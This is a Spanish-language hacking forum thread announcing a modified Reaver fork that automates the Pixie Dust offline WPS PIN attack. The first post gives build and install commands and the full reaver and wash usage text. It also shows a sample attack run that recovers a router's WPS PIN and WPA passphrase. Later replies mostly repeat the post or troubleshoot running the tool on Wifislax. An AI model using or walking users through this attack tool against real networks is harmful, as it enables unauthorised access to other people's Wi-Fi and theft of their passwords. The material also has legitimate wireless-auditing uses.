elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recopilación Tutoriales y Manuales Hacking, Seguridad, Privacidad, Hardware, etc


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking Wireless
| | |-+  Reaver modfication for Pixie Dust Attack (pixiewps)
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: Reaver modfication for Pixie Dust Attack (pixiewps)  (Leído 19,023 veces)
t6_x

Desconectado Desconectado

Mensajes: 1


Ver Perfil
Reaver modfication for Pixie Dust Attack (pixiewps)
« en: 16 Abril 2015, 18:34 pm »

Hola

DataHead y me hicieron modificaciones en reaver para hacer que el Pixie Dust Attack e probar el número de pin y automatizar todo el trabajo

Aquí está nuestra contribución

GitHub
https://github.com/t6x/reaver-wps-fork-t6x



Overview

    reaver-wps-fork-t6x es una modificación hecho desde el tenedor de reaver (ht tps://code.google.com/p/reaver-wps-fork/)

    Esta versión modificada utiliza el ataque del Pixie Dust de encontrar el número de PIN correcto de wps offline

    El ataque se utiliza en esta versión fue desarrollada por Wiire (ht tps://github.com/wiire/pixiewps)



Install Required Libraries and Tools

    Libraries for reaver

      
Código:
sudo apt-get install libpcap-dev aircrack-ng sqlite3 libsqlite3-dev

    Tools

      
Código:
You must have installed the pixiewps created by Wiire (ht tps://github.com/wiire/pixiewps)



Compile and Install

Código:
Build Reaver

      cd reaver-wps-fork-t6x-master
      cd src
      ./configure
      make

Install Reaver

      sudo make install



Usage - Reaver

Código:
Reaver v1.5.1 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com>
mod by DataHead

Required Arguments:
        -i, --interface=<wlan>          Name of the monitor-mode interface to use
        -b, --bssid=<mac>               BSSID of the target AP

Optional Arguments:
        -m, --mac=<mac>                 MAC of the host system
        -e, --essid=<ssid>              ESSID of the target AP
        -c, --channel=<channel>         Set the 802.11 channel for the interface (implies -f)
        -o, --out-file=<file>           Send output to a log file [stdout]
        -s, --session=<file>            Restore a previous session file
        -C, --exec=<command>            Execute the supplied command upon successful pin recovery
        -D, --daemonize                 Daemonize reaver
        -a, --auto                      Auto detect the best advanced options for the target AP
        -f, --fixed                     Disable channel hopping
        -5, --5ghz                      Use 5GHz 802.11 channels
        -v, --verbose                   Display non-critical warnings (-vv for more)
        -q, --quiet                     Only display critical messages
        -K, --pixie-dust                Test Pixie Dust [1] Basic(-S) [2] With E-Once(-S) [3] With PKR
        -Z, --no-auto-pass              Not run automatically reaver to get the password when the pixiewps retrieves the pin
        -h, --help                      Show help

Advanced Options:
        -p, --pin=<wps pin>             Use the specified 4 or 8 digit WPS pin
        -d, --delay=<seconds>           Set the delay between pin attempts [1]
        -l, --lock-delay=<seconds>      Set the time to wait if the AP locks WPS pin attempts [60]
        -g, --max-attempts=<num>        Quit after num pin attempts
        -x, --fail-wait=<seconds>       Set the time to sleep after 10 unexpected failures [0]
        -r, --recurring-delay=<x:y>     Sleep for y seconds every x pin attempts
        -t, --timeout=<seconds>         Set the receive timeout period [5]
        -T, --m57-timeout=<seconds>     Set the M5/M7 timeout period [0.20]
        -A, --no-associate              Do not associate with the AP (association must be done by another application)
        -N, --no-nacks                  Do not send NACK messages when out of order packets are received
        -S, --dh-small                  Use small DH keys to improve crack speed
        -L, --ignore-locks              Ignore locked state reported by the target AP
        -E, --eap-terminate             Terminate each WPS session with an EAP FAIL packet
        -n, --nack                      Target AP always sends a NACK [Auto]
        -w, --win7                      Mimic a Windows 7 registrar [False]
        -X, --exhaustive                Set exhaustive mode from the beginning of the session [False]
        -1, --p1-index                  Set initial array index for the first half of the pin [False]
        -2, --p2-index                  Set initial array index for the second half of the pin [False]
        -P, --pixiedust-loop            Set Into PixieLoop mode ( doesnt send M4, and loops through to M3 [False]

Example:
        reaver -i mon0 -b 00:90:4C:C1:AC:21 -vv -K 1



Usage - wash

Código:
Wash v1.5.1 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com>
mod by DataHead

Required Arguments:
        -i, --interface=<iface>              Interface to capture packets on
        -f, --file [FILE1 FILE2 FILE3 ...]   Read packets from capture files

Optional Arguments:
        -c, --channel=<num>                  Channel to listen on [auto]
        -o, --out-file=<file>                Write data to file
        -n, --probes=<num>                   Maximum number of probes to send to each AP in scan mode [15]
        -D, --daemonize                      Daemonize wash
        -C, --ignore-fcs                     Ignore frame checksum errors
        -5, --5ghz                           Use 5GHz 802.11 channels
        -s, --scan                           Use scan mode
        -u, --survey                         Use survey mode [default]
        -P, --file-output-piped              Output Piped x|y|z...
        -g, --get-chipset                    Output Piped and tries to read the chipset with reaver
        -h, --help                           Show help

Example:
        wash -i mon0



Example

Código:
Reaver v1.5.1 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com>

[+] Switching mon0 to channel 1
[?] Restore previous session for A.:9.:D.:....:....:...? [n/Y] n
[+] Waiting for beacon from A.:9.:D.:....:....:...
[+] Associated with A.:9.:D.:....:....:.... (ESSID: ......)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: c6:66:a6:72:37:6d:......
[P] PKE: 10:cf:cc:88:99:4b:15:de:a6:b3:26:fe:93:24:......
[P] WPS Manufacturer: Ralink Technology, Corp.
[P] WPS Model Number: RT2860
[P] WPS Model Serial Number: A978FD123BC
[+] Received M1 message
[P] PKR: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:......
[P] AuthKey: bf:68:34:b5:ce:e2:a1:24:dc:15:01:1c:78:9e:74:......
[+] Sending M2 message
[P] E-Hash1: 2e:d5:17:16:36:b8:c2:bb:d1:14:7c:18:cf:89:58:b8:1d:9d:39:......
[P] E-Hash2: 94:fb:41:53:55:b3:8e:1c:fe:2b:a3:9b:b5:82:11:......
[Pixie-Dust]
[Pixie-Dust]   [*] ES-1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust]   [*] ES-2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust]   [*] PSK1: dd:09:bd:24:......
[Pixie-Dust]   [*] PSK2: 77:e0:dd:00:......
[Pixie-Dust]   [+] WPS pin: 9178....
[Pixie-Dust]
[Pixie-Dust]   [*] Time taken: 0 s
[Pixie-Dust]
Running the reaver with the correct pin wait ...

[Reaver Test] BSSID: A.:9.:D.:3.:..:..
[Reaver Test] Channel: 1
[Reaver Test] [+] WPS PIN: '9178....'
[Reaver Test] [+] WPA PSK: '112233'
[Reaver Test] [+] AP SSID: '....'


Código:
# wash -i mon0 -g -c 2
XX:XX:XX:XX:XX:XX| 1|-68|1.0|No |AAA| D-Link| DIR-615
XX:XX:XX:XX:XX:XX| 1|-58|1.0|No |CCC| ASUSTeK Computer Inc.| RT-N56U



Cualquier problema o sugerencia por favor póngase en contacto conmigo


« Última modificación: 16 Abril 2015, 23:42 pm por t6_x » En línea

El_Andaluz


Desconectado Desconectado

Mensajes: 4.179



Ver Perfil
Re: Reaver modfication for Pixie Dust Attack (pixiewps)
« Respuesta #1 en: 17 Abril 2015, 00:54 am »

Hola buenas me alegro mucho que lo hayas publicado aquí me descargue este programa en otro foro que vi que lo publicaste me gustaría saber como lo ejecuto en Wifislax 4.10.1 ? Gracias.


En línea

engel lex
Moderador Global
***
Desconectado Desconectado

Mensajes: 15.514



Ver Perfil
Re: Reaver modfication for Pixie Dust Attack (pixiewps)
« Respuesta #2 en: 17 Abril 2015, 01:01 am »

Hola buenas me alegro mucho que lo hayas publicado aquí me descargue este programa en otro foro que vi que lo publicaste me gustaría saber como lo ejecuto en Wifislax 4.10.1 ? Gracias.

Hola

DataHead y me hicieron modificaciones en reaver para hacer que el Pixie Dust Attack e probar el número de pin y automatizar todo el trabajo

Aquí está nuestra contribución

GitHub
https://github.com/t6x/reaver-wps-fork-t6x



Overview

    reaver-wps-fork-t6x es una modificación hecho desde el tenedor de reaver (ht tps://code.google.com/p/reaver-wps-fork/)

    Esta versión modificada utiliza el ataque del Pixie Dust de encontrar el número de PIN correcto de wps offline

    El ataque se utiliza en esta versión fue desarrollada por Wiire (ht tps://github.com/wiire/pixiewps)



Install Required Libraries and Tools

    Libraries for reaver

     
Código:
sudo apt-get install libpcap-dev aircrack-ng sqlite3 libsqlite3-dev

    Tools

     
Código:
You must have installed the pixiewps created by Wiire (ht tps://github.com/wiire/pixiewps)



Compile and Install

Código:
Build Reaver

      cd reaver-wps-fork-t6x-master
      cd src
      ./configure
      make

Install Reaver

      sudo make install
En línea

El problema con la sociedad actualmente radica en que todos creen que tienen el derecho de tener una opinión, y que esa opinión sea validada por todos, cuando lo correcto es que todos tengan derecho a una opinión, siempre y cuando esa opinión pueda ser ignorada, cuestionada, e incluso ser sujeta a burla, particularmente cuando no tiene sentido alguno.
El_Andaluz


Desconectado Desconectado

Mensajes: 4.179



Ver Perfil
Re: Reaver modfication for Pixie Dust Attack (pixiewps)
« Respuesta #3 en: 17 Abril 2015, 01:59 am »

Citar
Reaver v1.5.1 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com>
mod by DataHead

Required Arguments:
        -i, --interface=<wlan>          Name of the monitor-mode interface to use
        -b, --bssid=<mac>               BSSID of the target AP

Optional Arguments:
        -m, --mac=<mac>                 MAC of the host system
        -e, --essid=<ssid>              ESSID of the target AP
        -c, --channel=<channel>         Set the 802.11 channel for the interface (implies -f)
        -o, --out-file=<file>           Send output to a log file [stdout]
        -s, --session=<file>            Restore a previous session file
        -C, --exec=<command>            Execute the supplied command upon successful pin recovery
        -D, --daemonize                 Daemonize reaver
        -a, --auto                      Auto detect the best advanced options for the target AP
        -f, --fixed                     Disable channel hopping
        -5, --5ghz                      Use 5GHz 802.11 channels
        -v, --verbose                   Display non-critical warnings (-vv for more)
        -q, --quiet                     Only display critical messages
        -K, --pixie-dust                Test Pixie Dust [1] Basic(-S) [2] With E-Once(-S) [3] With PKR
        -Z, --no-auto-pass              Not run automatically reaver to get the password when the pixiewps retrieves the pin
        -h, --help                      Show help

Advanced Options:
        -p, --pin=<wps pin>             Use the specified 4 or 8 digit WPS pin
        -d, --delay=<seconds>           Set the delay between pin attempts [1]
        -l, --lock-delay=<seconds>      Set the time to wait if the AP locks WPS pin attempts [60]
        -g, --max-attempts=<num>        Quit after num pin attempts
        -x, --fail-wait=<seconds>       Set the time to sleep after 10 unexpected failures
       -r, --recurring-delay=<x:y>     Sleep for y seconds every x pin attempts
        -t, --timeout=<seconds>         Set the receive timeout period [5]
        -T, --m57-timeout=<seconds>     Set the M5/M7 timeout period [0.20]
        -A, --no-associate              Do not associate with the AP (association must be done by another application)
        -N, --no-nacks                  Do not send NACK messages when out of order packets are received
        -S, --dh-small                  Use small DH keys to improve crack speed
        -L, --ignore-locks              Ignore locked state reported by the target AP
        -E, --eap-terminate             Terminate each WPS session with an EAP FAIL packet
        -n, --nack                      Target AP always sends a NACK [Auto]
        -w, --win7                      Mimic a Windows 7 registrar [False]
        -X, --exhaustive                Set exhaustive mode from the beginning of the session [False]
        -1, --p1-index                  Set initial array index for the first half of the pin [False]
        -2, --p2-index                  Set initial array index for the second half of the pin [False]
        -P, --pixiedust-loop            Set Into PixieLoop mode ( doesnt send M4, and loops through to M3 [False]

Example:
        reaver -i mon0 -b 00:90:4C:C1:AC:21 -vv -K 1

Lo acabo de probar en Wifislax en la ultima versión me quedado hasta aquí angel lex pero se me olvidado poner lo de wash -i mon0, me quedado bloqueado mentalmente y no sabía  que hacer mas. No Existe alguna manera de hacer este Script en un archivo xzm y meterlo en la carpeta modulo del wifislax y ejecutarlo directamente sin tener que estar copiando y pegando código? Me parece un poco incomodo tener que hacer esto cada vez que meta el Pen boteado en mi portátil es lo que pienso yo.

Una duda que tengo si pongo Wash -i mon0 cual chipt se me activa la de interior de mi portátil o la externa en mi caso sería la Alfa ? Por que quiero que se active mi antena Alfa de exterior con este script.Saludos.
« Última modificación: 17 Abril 2015, 02:19 am por El_Andaluz » En línea

engel lex
Moderador Global
***
Desconectado Desconectado

Mensajes: 15.514



Ver Perfil
Re: Reaver modfication for Pixie Dust Attack (pixiewps)
« Respuesta #4 en: 17 Abril 2015, 02:10 am »

hazlo un .sh


es script bash normal, lo corres con sudo y debería ir bien :P

en tu wifislax para confirmar porque no se, escribe
Código:
which bash
y responderá algo como
Citar
/bin/bash

entonces, creas un archivo en blanco
la primera linea va a ser (el resultado de tu which)
Código
  1. #!/bin/bash


luego el resto de las lineas serán los comandos que hiciste
lo guardas, y le colocas .sh, luego abres consola y le das permisos de ejecución

Código
  1. chmod +x archivo.sh

ahí deberías tener eso listo
En línea

El problema con la sociedad actualmente radica en que todos creen que tienen el derecho de tener una opinión, y que esa opinión sea validada por todos, cuando lo correcto es que todos tengan derecho a una opinión, siempre y cuando esa opinión pueda ser ignorada, cuestionada, e incluso ser sujeta a burla, particularmente cuando no tiene sentido alguno.
El_Andaluz


Desconectado Desconectado

Mensajes: 4.179



Ver Perfil
Re: Reaver modfication for Pixie Dust Attack (pixiewps)
« Respuesta #5 en: 17 Abril 2015, 14:08 pm »

Bueno voy a explicar los pasos que he echo dado que no hay un archivo en xzm para que se ejecute mejor y mas rápido sin tener que estar instalando tantas cosas y metiendo tantos códigos.

Aquí tenéis los pasos que he seguido:

Primer paso he echo descomprimir el archivo en el escritorio de Wifislax:

Lo raro de todo esto que os pongo y me salta errores que al final del todo me escanea las redes, pero luego no me hace mas nada mi pregunta es que es lo que echo mal ? Me estoy agobiando y tengo echo un lío que no se ni que hacer ya.
« Última modificación: 17 Abril 2015, 14:17 pm por El_Andaluz » En línea

sanson


Desconectado Desconectado

Mensajes: 471


Ver Perfil
Re: Reaver modfication for Pixie Dust Attack (pixiewps)
« Respuesta #6 en: 17 Abril 2015, 14:40 pm »

Hola

Y si quieres un xzm ¿por que no creas el modulo a partir del script?.  

http://foro.seguridadwireless.net/index.php?topic=44883.0

http://foro.seguridadwireless.net/index.php?topic=47093.0

http://foro.seguridadwireless.net/index.php?topic=52220.0

Creo que no tienes claro que es eso que tienes entre manos.  Wash , es el scaner de goda la vida para detectar redes con wps activado , no tiene nada mas que hacer , que mostrar las redes, el siguiente paso es copiar esos datos para usarlos con reaver (modificado o no) como siempre

Saludos
En línea

Es más difícil desaprender conocimientos inútiles, que aprender cosa nuevas.

MANUAL BÁSICO DE WIFISLAX Y SUS HERRAMIENTAS DE AUDITORIA WIRELESS
El_Andaluz


Desconectado Desconectado

Mensajes: 4.179



Ver Perfil
Re: Reaver modfication for Pixie Dust Attack (pixiewps)
« Respuesta #7 en: 17 Abril 2015, 16:03 pm »

Hola buenas Sanson: Ya he intentado hacer un xzm desde Wifislax lo puedo hacer lo que pasa que luego no me funcionan por que le falta las dependencia, yo me hago un lio la verdad, siempre que intentado hacer algo de esto al final todo me sale mal, solo digo que es mas cómodo para todos hacer este script en un archivo xzm a mi me no sale bien si alguien sabe hacerlo se lo agradecería.

Citar
Creo que no tienes claro que es eso que tienes entre manos.  Wash , es el scaner de goda la vida para detectar redes con wps activado , no tiene nada mas que hacer , que mostrar las redes, el siguiente paso es copiar esos datos para usarlos con reaver (modificado o no) como siempre

Se supone que esto es el Reaver modificado después leo en otro sitio y ha aparece una herramienta parecía a esta y dice que es el reaver1.5 modificado, wash ya se que es para scanear las redes hasta hay llego lo que si te fijas en las imagines que te he puesto he echo algo mal me salta errores como si me faltara algo ? Estoy un perdido. :(

Pero que me estas diciendo que el script este solo sirve para mostrar las redes ?? Y luego copiarlo y pegar en el reaver normal ?? NO entiendo bien. :-(
« Última modificación: 17 Abril 2015, 16:09 pm por El_Andaluz » En línea

sanson


Desconectado Desconectado

Mensajes: 471


Ver Perfil
Re: Reaver modfication for Pixie Dust Attack (pixiewps)
« Respuesta #8 en: 17 Abril 2015, 17:30 pm »

Hola



Example:
        reaver -i mon0 -b 00:90:4C:C1:AC:21 -vv -K 1

No,  te digo que cuando te ha escaneado , es porque has puesto el código de whash para que scanee y es lo que ha hecho , por eso cuando dices " y no hace nada mas" es que eso es lo que tiene que hacer.  

Esto es reaver modificado, para que con la información que o tiene del M1 M2..... El siguiente pin que pruebe , sea el quenerado por pixie y por tanto el bueno en las mac vulnerables

Saludos
En línea

Es más difícil desaprender conocimientos inútiles, que aprender cosa nuevas.

MANUAL BÁSICO DE WIFISLAX Y SUS HERRAMIENTAS DE AUDITORIA WIRELESS
El_Andaluz


Desconectado Desconectado

Mensajes: 4.179



Ver Perfil
Re: Reaver modfication for Pixie Dust Attack (pixiewps)
« Respuesta #9 en: 17 Abril 2015, 17:44 pm »

Entonces lo que yo he echo esta mal o estas bien ? Yo lo que echo he mete todo los codigo uno por uno hasta llegar aquí


Pero solo me sale eso ya esta no me da el pin ni nada ahora que hago con eso no me dice nada eso lo mismo que me hace en el wifislax otras herramientas no se si me entiendes.

Y otra herramienta que he visto es esta que no se, si tiene que ver algo con esto que estamos hablando o es diferente. Esta el reaver t6x/reaver-wps-fork-t6x es modificado del reaver 1.5

hay dos reaver 1.5 modificado para pixiewps

reaver 1.5 modificado para pixiewps


https://www.youtube.com/watch?v=GRMyqGcbBWQ
« Última modificación: 17 Abril 2015, 17:47 pm por El_Andaluz » En línea

Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Desinstalar reaver 1.4 e instalar reaver 1.3 en wifislax
Wireless en Linux
fjarias 5 9,493 Último mensaje 31 Octubre 2012, 21:24 pm
por MEGAHOM
Ataque Pixie Dust Attack y Ataque Blackjack « 1 2 »
Wireless en Linux
ChimoC 10 11,829 Último mensaje 2 Abril 2015, 11:34 am
por sanson
PixieScript v2.1, ataque automátizado Pixie Dust Attack « 1 2 »
Wireless en Linux
ChimoC 10 17,475 Último mensaje 3 Septiembre 2018, 09:08 am
por BgCRaCK
PixieScript v2.5, ataque automatizado Pixie Dust Attack
Wireless en Linux
El_Andaluz 0 5,481 Último mensaje 26 Abril 2015, 06:09 am
por El_Andaluz
Crackear pin WPS sin "patrón"
Hacking Wireless
hiispow 9 6,771 Último mensaje 17 Septiembre 2015, 23:28 pm
por Sh4k4
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines